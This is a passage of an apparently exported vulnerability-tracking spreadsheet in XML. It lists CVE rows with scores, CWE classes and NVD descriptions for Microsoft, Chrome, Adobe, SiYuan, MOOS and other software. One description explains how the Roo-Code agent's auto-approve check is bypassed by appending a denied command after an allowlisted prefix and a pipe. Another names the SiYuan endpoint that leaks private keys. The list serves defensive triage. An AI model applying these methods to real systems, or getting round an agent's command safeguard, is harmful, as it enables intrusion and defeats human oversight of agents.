          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81955</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81996</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R394"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S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82536</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability in the shell command parsing logic that allows attackers to execute denied shell commands by exploiting the omission of the bash pipe operator from the command parser's operator token set. Attackers can craft a command line with an allowlisted prefix followed by the stderr-redirecting pipe operator and a denied command, causing the parser to approve the full pipeline while bash executes the denied component with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83941</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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98" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83998</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84187</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>AVideo contains a missing authentication vulnerability in plugin/Live/on_publish.php that allows unauthenticated attackers to mark arbitrary scheduled broadcasts as failed by sending crafted POST requests with schedule identifiers. Attackers can exploit the unguarded RTMP callback endpoint to modify scheduled broadcast status fields by supplying fabricated stream keys matching the pattern -ps-&lt;N&gt;, silently canceling any scheduled live broadcast without credentials or authorization.</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84187</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85049</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>Use after free in Skia in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85049</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85051</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85051</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85053</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>Improper resource exposure in CacheStorage in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85053</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85094</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>The Canva Android App  before 2.376.0 did not restrict the headers returned to an external origin running in a privileged WebView. A threat actor with control of the WebView could access a user’s session.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85094</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85175</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions &lt;= 3.8.1 (fixed in v3.8.2) contain an incomplete blocklist in the IsForbiddenAbsPath() function (kernel/util/path_guard.go), which only blocks conf/conf.json by exact match and does not restrict the TLS private key (conf/key.pem) or CA private key (conf/ca.key) stored in the same conf/ directory. Because the getFile handler skips the blocklist for RoleAdministrator and all authenticated users receive RoleAdministrator in v3.8.1, any user (or any client on a default no-auth-code instance) can retrieve these private keys via POST /api/file/getFile. On deployments with TLS enabled, this allows decryption of captured HTTPS traffic (key.pem) and forging of certificates trusted by clients that imported SiYuan's CA (ca.key).</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85175</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85430</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through 10.0.1 contains an authentication bypass vulnerability in pShare that accepts UDP datagrams from any source and republishes them with the attacker-claimed identity intact. Attackers can send crafted UDP datagrams to pShare input routes to inject messages into the local MOOS community under spoofed identities, or send malformed datagrams to crash the pShare process.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85430</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85432</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate client identity in MOOSDB message processing, allowing authenticated attackers to attribute writes to other clients by supplying arbitrary source identifiers in serialized messages. Attackers can forge message origins and cancel third-party subscriptions by exploiting the disconnect between authenticated connection identity and wire-supplied source attribution.</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85432</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85455</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a buffer over-read vulnerability in CMOOSCommPkt where a four-byte packet triggers out-of-bounds memory access during deserialization. Attackers can open a TCP connection to the MOOSDB port and send a crafted short packet to read memory before authentication.</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85455</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85684</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R409" s="5" t="inlineStr">
        <is>
